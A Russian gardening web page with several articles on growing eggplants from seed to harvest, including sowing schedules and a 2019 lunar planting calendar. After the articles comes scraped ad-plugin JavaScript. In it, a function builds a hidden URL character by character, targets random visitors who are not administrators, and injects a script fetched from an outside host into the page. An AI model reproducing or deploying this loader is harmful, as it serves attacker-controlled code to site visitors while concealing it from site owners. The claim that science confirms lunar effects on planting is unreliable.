1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Особенности выращивания баклажан

Выращивание баклажанов в открытом грунте

Баклажан — культура семейства пасленовых, популярный овощ, выращиваемый многими огородниками на своих дачных участках. Технология выращивания баклажанов в открытом грунте имеет свои характерные особенности, которые мы рассмотрим в этой статье.

Детально рассмотрим как вырастить рассаду баклажанов, ухаживать за ней до пересадки в открытый грунт, чем обрабатывать баклажаны от вредителей и болезней, как правильно собирать и где хранить урожай баклажанов.

Выращивание баклажан из семян

Куст баклажана высотой от 40-150 см с крупными зелеными листьями. Плоды вырастают длиной до 70 см, диаметром до 20 см, вес бывает до 1 кг глянцево-фиолетового цвета.

Баклажан теплолюбивое и солнцелюбивое растение. Хорошо растет в местах, защищенных от ветра и куда светит солнышко.

Посев семян баклажан

Самый теплолюбивый овощ семейства пасленовых — баклажан, он не переносит заморозка, поэтому в основном его выращивают через рассаду. Созревание плодов происходит через 100 дней после появления первых всходов.

Посев семян на рассаду проводят в течении марта месяца, начиная с первых чисел. Сроки посева рассчитывают так: при пересадке рассады в грунт земля должна прогреться до +18 градусов, а возраст рассады уже к этому моменту должен быть 55-75 дней.

Почва для посева семян баклажанов должна быть рыхлой, содержать в своем составе песок и глину. Весной в грунт можно добавить перегной.

Семена предварительно подвергают тепловой обработке в нагретой до 50 градусов воде в течении 20 минут и сразу охладить в холодной воде, а затем необходимо обработать в слабом растворе марганцовки (если семена не покупные) в течении 30 мин. Можно перед посевом прорастить семена во влажной марле, так всходы появятся быстрей.

Высаживать семена нужно в подготовленные индивидуальные горшочки или пластиковые стаканчики с грунтом. Семена заглубляют на 1 см в грунт, уплотняют почву, и накрывают пленкой.

Выращивание рассады

Семена баклажанов прорастают при температуре 25-26 градусов в течении 10-15 дней. При появлении всходов снимают пленку с горшочков, и повышают освещенность для рассады, температуру воздуха со временем можно понизить до 16-20 градусов (так рассада баклажанов не вытянется, будет лучше развита корневая система).

Баклажаны не переносят сквозняков и резких перепадов температуры, могут заболеть. Всходы требуют регулярного полива, периодически проводят подкормки.

Снизив поливы, обеспечив достаточную освещенность и прохладное место размещения рассады — ростки не будут вытягиваться, рост немного замедлится, растения будут зеленые, крепкие и здоровые.

Пикирование баклажанов

Если все же не получилось посеять семена в отдельные стаканчики, подросшую рассаду баклажанов пикируют. Баклажаны плохо переносят пикирование, поэтому старайтесь при пересадке не повредить растения.

Баклажаны за сутки до пикировки поливают, затем осторожно извлекают из общей емкости и перемещают в отдельные горшочки.

Видео — как сеять баклажаны на рассаду

Высадка рассады баклажанов в открытый грунт

Когда открытый грунт прогреется достаточно хорошо (+18 градусов), высаживают рассаду баклажанов. Это происходит примерно в конце мая — начале июня. Саженцы должны иметь по 5 листков и корень длиной до 10 см (возраст ростков 2-2,5 месяца).

Место высадки баклажанов должно быть солнечным и защищенным от ветра. Лучшие предшественники на участке для баклажанов — огурец, капуста, морковь, чеснок, лук, горох.

Пересадку рассады проводят во второй половине дня.

Перед посадкой в грунт рассаду необходимо полить теплой отстояной водой.

Расстояние между растениями не менее 40 см, а между рядами 60 см.

Рассаду высаживают следующим образом:

— выкапывается ямка по размеру
— ямку заливают теплой отстояной водой
— садится саженец в ямку и присыпают землей до уровня поверхности
— мульчируют слоем торфяной земли.

Первые 2 недели после посадки следить чтобы земля оставалась все время влажной.

Внимание! Не забывайте главное правило при выращивании рассады — лучше не дорастить, чем пере растить.

Технология выращивания баклажана

Основной уход в процессе роста растений заключается в соблюдении полива, прополке от сорняков и рыхлении почвы, формировании кустов, а также своевременной подкормке удобрениями.

Уход за баклажанами

У баклажанов непрочная и нежная корневая система, поэтому вместо постоянной прополки накройте грядки нетканым материалом или сухой травой.

Во время цветения цветков баклажаны опрыскивают сладкой водой для лучшего опыления. В это время запрещено применять химикаты.

Высокие сорта баклажанов обязательно подвязывают к опорам.

Когда поливать баклажаны

В период массового формирования плодов баклажаны нуждаются в обильном поливе. Поливают теплой отстояной водой температурой 25-30 градусов в вечернее время. Поливать только под корень не попадая на литья. На следующий день после полива удалить сорняки и разрыхлить осторожно грунт вокруг растений и между рядами.

Формируем куст баклажана

Через месяц после цветения на кустах формируются плоды.

Для получения высокого урожая баклажанов необходимо проводить пасынкование кустов. Регулярно обрывайте пасынки тем самым формируя куст.

Правильно развитый куст должен иметь 3 боковых побега и не больше 10 завязей.

Формирование низкорослых сортов не требует особых усилий, удаляйте не нужные завязи, которые не успеют созреть до холодов.

Формирование высокорослых сортов может быть разным:

— куст в один стебель, для высокорослых сортов растущих в мини теплице, или слабых растений, не способных удержать все свои плоды. Сохраняют самый крепкий стебель, подвязывают к опоре
— для средне высоких растений формируют куст с двумя побегами. Лишние пасынки удаляются, остается 2 сильных побега для выращивания плодов
— при недостаточном количестве рассады оставляют 3 основных стебля. Такой метод подойдет при выращивании на большом расстоянии между кустами.

Побеги без завязей следует удалить. Так куст будет выглядеть голым, солнечные лучи хорошо попадают на плоды.

Рост растения приостанавливают прищипывая верхушку, так урожай начинает быстрее созревать.

При высокой температуре воздуха цветки опадают, не правильно формируются завязи, плоды со вкусом горечи.

Подкормка баклажанов в открытом грунте

За время вегетационного периода баклажаны нуждаются в трех разовой подкормке: смесь минеральных удобрений (по 10 г селитры аммиачной и суперфосфата и 3 г сульфата калия на 1 м 2 площади участка) и навозных смесей.

Первая подкормка баклажанов проводится через 10 дней после пересадки в грунт.

Вторая подкормка происходит через 20 дней после пересадки, третья после появления плодов.

После подкормки не забывайте полить участок.

Вредители и болезни баклажанов

Баклажаны подвергаются нашествию вредителей при выращивании в открытом грунте. Вредители наносят повреждения растениям — это тля, слизни, медведки, трипсы. Необходимо обработать растение Фитофермом. Любят баклажаны и колорадские жуки.

Баклажаны подвержены различным грибковым и бактериальным заболеваниям. Поражаются серой гнилью, столбуром, мозаикой, фитофторозом.

Опрыскивайте растения Фитоспорином (безвреден для людей и животных) 3-4 раза за сезон, чтобы предотвратить болезни.

Видео — особенности выращивания баклажанов, рассады, болезни и вредители

Сбор урожая и хранение баклажанов

Первые созревшие плоды можно увидеть уже в июле.

Сбор урожая начинать исходя из таких признаков:

— мякоть упругая, насыщена соком;
— семена в плодах светлые;
— длина плодов 10 см и выше;
— разные сорта имеют свою окраску плодов (от белой до фиолетовой);
— поверхность стает глянцевой, блестит.

Собирайте баклажаны вовремя не допуская перезревания плодов (окрас темно-коричневый, твердый, не вкусный плод) каждую неделю.

Баклажаны с кустов срезают секатором или осторожно срывают руками вместе с частью плодоножки.

Хранятся баклажаны не долго, поэтому следует их консервировать в виде икры, замариновать, засушить порезав частями.

Чтобы сохранить плоды около месяца, стоит поместить баклажаны в темное помещение с температурой не выше 10 градусов и высокой влажностью.

Хорошо баклажаны хранятся в холодильнике. Благодаря высоким вкусовым качествам, баклажаны выращивают во всем мире, их широко используют в приготовлении различных блюд, консервировании.

Соблюдая технологию выращивания баклажанов вы сможете добиться высоких урожаев прекрасных и полезных овощей.

Особенности выращивания баклажанов

Ну как не вырастить такой овощ на своем участке?

ЧТО ЛЮБЯТ БАКЛАЖАНЫ?

Богатую органикой, влаго- и воздухопроницаемую почву с нейтральной реакцией, достаточное увлажнение почвы и воздуха, повышенные дозы азота, солнце, тепло. Для их роста и развития нужна температура 23-27 градусов. Баклажаны погибают уже при нулевой температуре, а при 12-14 градусах перестают расти и развиваться. В Нечерноземной зоне и на Северо-Западе их выращивают только в теплицах. В пищу употребляют плоды не достигшие физиологической спелости.

ЧЕГО НЕ ЛЮБЯТ БАКЛАЖАНЫ?

Бедных, плотных или уплотняющихся после полива кислых почв, полива холодной водой, холодных ночей, резкой смены температур, длительного похолодания, засухи.

ПРАВИЛА ПОСЕВА

У баклажана крупная листва и слабая корневая система, поэтому он плохо переносит пересадки. Для ускорения прорастания семена нужно прогреть, как это сделать, кто еще не знаком, написано здесь. Лучше всего его, как и перец, сразу сеять в горшочки или другие емкости объемом 0,5-1 литр, чтобы не пикировать. Заполнить емкости подготовленной почвосмесью, такой, как для томатов и перцев, увлажнить, уплотнить и аккуратно положить на поверхность почвы по одному прогретому семечку в каждый горшочек и присыпать сверху сухой почвой слоем 1,5-2 см, еще раз уплотнить. Накрыть пленкой или стеклом и поставить в теплое место.

При температуре 28-30 градусов баклажаны всходят через 10 дней, при 20-22 градусах – через 15 дней, при температуре ниже 18 градусов – могут вообще не взойти. При появлении петельки всходов рассаду следует поставить в светлое прохладное место, затем перенести в более теплое место. Если же семена посеяны в ОБЩУЮ емкость, то пикировку наиболее легко переносят растеньица с двумя настоящими листочками.

При пикировке растеньице следует брать не за стебелек, а за семядольные листочки. Отпустить корни и часть стебелька в воронку так, чтобы корни не загибались. Если центральный корень слишком длинный – его можно укоротить.

Баклажан ПРИ ПЕРЕСАДКЕ ЗАГЛУБЛЯЮТ В ПОЧВУ по семядольные листочки.

Почву вокруг растений нужно обжать. полить и поставить подальшеот света на 2-3 дня, пока рассада не приживется, затем ее надо перенести под лампу дневного света.

ПОДКОРМКУ надо делать с момента появления петельки всходов. Подкормки следует делать регулярно один раз в неделю, используя удобрение “Кемира-люкс” или любое другое комплексное удобрение (1 ч. ложку на 5 л воды). Хорошо чередовать подкормки минеральными удобрениями с подкормками гуматами (использовать по инструкции). Дело в том, что баклажанам требуется азот в большей мере, чем перцам или томатам.

ПЕРЕСАДКА РАССАДЫ В ТЕПЛИЦУ

Перед перевозкой на участок рассаду 2-3 дня не поливают. Тогда она легче переносит переезд. Пересадку рассады в теплицу надо сделать в возрасте 70-80 дней, закалка при этом не требуется. В южных районах рассаду высаживают в грунт в возрасте 35-40 дней предварительно закалив ее на воздухе по 3-4 часа в течение 2-3 дней.

ПЕРЕД ВЫСАДКОЙ рассады сделайте лунки, внесите в них по 1 ст. ложке азофоски, налейте полную лунку воды (в холодных регионах горячей) и, как только вода впитается в почву, высаживайте рассаду вместе с комом земли. Пересаженные растения полейте, в солнечную погоду на 2-3 дня притените и не поливайте неделю. Приживается баклажан медленно, около 20 дней.

Баклажаны можно выращивать в одной теплице с томатами или с перцами. Вода для полива должна быть теплой (не ниже 20 градусов), поливку делают 2 раза в неделю, а в жаркое время – через день.

ОСОБЕННОСТИ ВЫРАЩИВАНИЯ

Баклажаны в теплицах плохо завязывают плоды, часто первые цветы опадают. Поэтому рекомендуется при появлении первых бутонов опрыскать их препаратами “Бутон” или “Завязь”.

Баклажаны окучивают, как томаты, почву рыхлят, после полива – мульчируют.

Формирование баклажана заключается в регулярном удалении пасынков. Нижние листья до первого налившегося плода следует постепенно убирать. Если куст сильный, то можно оставить пасынок и даже два. Но если куст слабый, то оставля ют только один стебель. После завязывания 4-5 плодов верхушку растения прищипывают.

Урожай снимают через каждые две недели. а на юге – через 7-8 дней, чтобы подросшие плоды не мешали быстро наливаться следующим завязям.

Делитесь этой важной информацией с друзьями в социальных сетях!

Выращивание баклажанов

Выращивание баклажанов непростое занятие, потому, что это, очень теплолюбивая культура. И это понятно, ведь его история начинается из Южной Азии, где как мы знаем, очень тепло . Поэтому выращивание баклажанов у нас в России происходит исключительно рассадным способом. Но в южных регионах его можно вырастить и в открытом грунте. Далее мы с вами подробно рассмотрим оба способа: рассадный и безрассадный. Начнем?

Рассадный способ для баклажанов

Выращивание баклажанов рассадным способом имеет свои нюансы (особенности), на которые следует обратить внимание в первую очередь. В списке ниже, мы рассмотрим самые важные моменты, которые все, желательно соблюдать в полном объеме.

  • Семена со сроком годности 1.5 — 2 года подходят лучше для выращивания рассады. Как раз в это время, и наблюдается самая лучшая всхожесть.
  • Дезинфекция (обеззараживание) семян и грунта под рассаду, а также посадочных емкостей.
  • Уход за рассадой. Полив, и температурный и световой режимы, подкормка.

Как подготовить семена перед посевом

Здесь, хочется заметить, что обработку нужно проводить, только для домашних семян. А вот, магазинные, уже готовы к употреблению. Заметим, что все семена, обрабатываются примерно одинаково. Далее, нажимая на ссылку мы попадаем на статью, где весь процесс подробно описан. >>>

Грунт для рассады баклажанов

Почвосмесь для рассады баклажан должна быть рыхлая и питательная. Ее можно приготовить самостоятельно или купить готовую в магазине. Про все это, можно почитать в статье >>

Сроки посева семян баклажан

Ближе к весне, опытные и не очень, огородники начинают подумывать об открытии рассадного сезона. Через рассаду, выращивается множество различных овощей, а вот баклажан здесь находится на первых строчках. И все потому, что это, очень теплолюбивое растение.

Мы должны понимать, что рассада должна вырасти крепкой и здоровой. И при этом, не должна перерасти или наоборот не дорасти. Поэтому, нужно точно знать, когда можно посадить баклажаны на рассаду. И вот, ради этого, мы должны самостоятельно определять оптимальные сроки для посадки.

Что особенно влияет на сроки посадки, рассмотрим ниже в списке:

  • Первое, на что обращаем внимание, так это сорт баклажан, который может быть ранним, среднеспелым и позднеспелым.
  • Далее, определяемся, где будем выращивать наши баклажаны. Это может быть теплица или открытый грунт. Но в России, без теплицы невозможно вырастить это капризное растение.
  • И конечно же, климатическая зона, где вы проживаете, будет влиять на выбор сроков посадки.

Как рассчитать сроки посадки

  • Период от времени посева семян до сбора урожая. Или просто период созревания. Исчисляется в днях или сутках.
    • Ранние сорта. 90 — 120 суток.
    • Среднеспелые. 121 — 141 суток.
    • Позднеспелые. Более 141 суток.
  • Время от посева семян до высадки в открытый грунт. Или возраст рассады.
    • Раннеспелые сорта. 61 — 66 суток.
    • Среднеспелые. 66 — 71 суток.
    • Позднеспелые. 71 — 81 суток.
  • Появление всходов. От 7 до 10 дней.
  • Восстановление после пикировки. От 7 до 10 дней.

И так, при среднем возрасте рассады 61 — 81 дней, у нас получается 78 — 90 дней. Это и есть, рассадный период наших баклажанов.

Посев семян на рассаду Высадка в грунт рассады
Раннеспелые сорта 20 — 25 февраля В начале мая
Среднеспелые 26 — 29 февраля С 10 — 20 мая
Позднеспелые Первая декада марта Конец мая

Сроки в климатических зонах

На Юге России. 1 — 2 декада февраля.

В Средней полосе России. 3 декада февраля или 1 декада марта.

На Урале и в Сибири. Первые числа марта.

В Ленинградской области. 1 декада марта.

Лунный календарь 2019 года

Многие дачники, для посадки семян, пользуются лунным календарем. Где, как мы знаем, растения растущие и дающие плоды не в земле, садят под растущую луну. А вот, все корнеплоды, садят под убывающую луну. Стоит заметить, что ученые подтверждают связь между луной и растениями.

Благоприятные дни для посева в 2019 году:

  • февраль — 6 — 8, 11 — 13, 20 — 25, 28;
  • март — 8 — 12, 15 — 20, 23 — 25, 27 — 29;
  • апрель — 1 — 4, 6 — 9, 11 — 13, 20, 21, 24 — 26, 29, 30;
  • май — 3, 4, 8 — 10, 17, 18, 21 — 23, 26 — 28, 21;
  • июнь — 5 — 6, 13 — 15, 18 — 20.

Неблагоприятные дни для посева в 2019 году:

  • февраль — 4, 5, 19;
  • март — 6, 7, 21;
  • апрель — 5, 19;
  • май — 5, 19;
  • июнь — 3, 4, 17.

Выделяем важные моменты при выращивании рассады баклажанов

Выращивание баклажанов на рассаду, в обязательном порядке, включает в себя, такие основные моменты, как полив, температурный и световой режимы, подкормки. А также, пикировку. Стоит заметить, что все это происходит также, как у перцев, помидор и огурцов. Незначительные отличия роли большой не играют. Поэтому, читаем вот эту статью >>

Выращивание баклажанов в открытом грунте

  • Готовим место на огороде для посадки рассады баклажан.
  • Правильно поливаем наши баклажаны.
  • Подкормка рассады.
  • Поддержка почвы в рыхлом состоянии.
  • Профилактика против болезней и вредителей.
  • Сроки и схема посадки баклажан.

Выбираем и готовим место на огороде

Место при выращивании баклажанов должно быть с солнечной стороны. И при этом, нужно предусмотреть, какую то защиту от ветров. Почва на этом участке, также должна соответствовать нормам. Где кислотность в пределах от 6.2 до 7 считается самой оптимальной. И еще, грунт обязан быть рыхлым и питательным. Желательно, чтобы это был суглинок, хорошо заправленный органикой.

Еще, один важный момент, это севооборот. Выращивание баклажанов не может быть успешным, без соблюдения севооборота. И здесь, нужно знать всех хороших предшественников. К ним можно отнести капусту, огурцы, морковь, лук, чеснок, кабачки, фасоль и горох. Плохие предшественники, это перцы, физалис, картофель, помидоры, ну и конечно баклажан.

Далее, можно поговорить о подготовке почвы на участке под баклажаны. Где, мы должны по осени перекопать участок, с достаточным количеством органических удобрений.

Но с перекопкой осенью, может не получится по каким то причинам. И, это не беда, потому что перекопать можно и весной. Но тогда, навоз должен быть полностью перепревшим (перегной). Золу и минеральные удобрения добавляют исключительно по весне. Кстати, баклажаны не любят свежий навоз. И, не только они.

Схема посадки баклажан

Заметим, что загущенные посадки баклажан неприемлемы, также как и редкие. Здесь, есть своя золотая середина, и это относится не только к баклажанам.

  • 30 см — 40 см между растениями.
  • 60 см — 65 см между рядами.

Поливаем правильно и рыхлим

Избыток влаги, также как и недостаток, негативно сказывается на развитии растений. Поэтому, поливаем умеренно, теплой водой (обязательно) и исключительно под корень. Влага на листьях, дает солнечные ожоги.

Далее очень важный момент, это рыхление почвы. Где, мы рыхлим землю вокруг кустов после каждого полива. Образование корки недопустимо.

Полив по мере высыхания — это то, что надо.

Подкормка для рассады баклажан

Выращивание баклажанов, не может быть успешным без подкормок органическими и минеральными удобрениями. Здесь, их можно чередовать между собой, либо кормить одной органикой или минералкой. Про подкормку подробно читаем в этой статье.

  • Растворы коровяка и птичьего помета.
  • Любые комплексные минеральные удобрения.
  • Народные средства. Например, растворы с йодом или мылом.

Профилактика против болезней

Здесь, севооборот играет немаловажную роль, поэтому выбираем правильных предшественников. Далее, нужно перед посадкой обработать почву раствором медного купороса или бордоской смесью.

Подготовка семян пройдена у нас еще перед посадкой на рассаду. Это тоже, профилактика от болезней, на ранней стадии. И, если все же беда случилась, то на помощь к нам придут Фитоспорин и Циркон. Более подробно про фунгициды (для борьбы и профилактики от болезней) можно почитать здесь.

Как формировать баклажан

Низкорослые сорта формировать не надо. А вот, высокорослые нужно. Здесь, смотрят по обстоятельствам. Растения можно делать в 1, 2 или 3 стебля.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};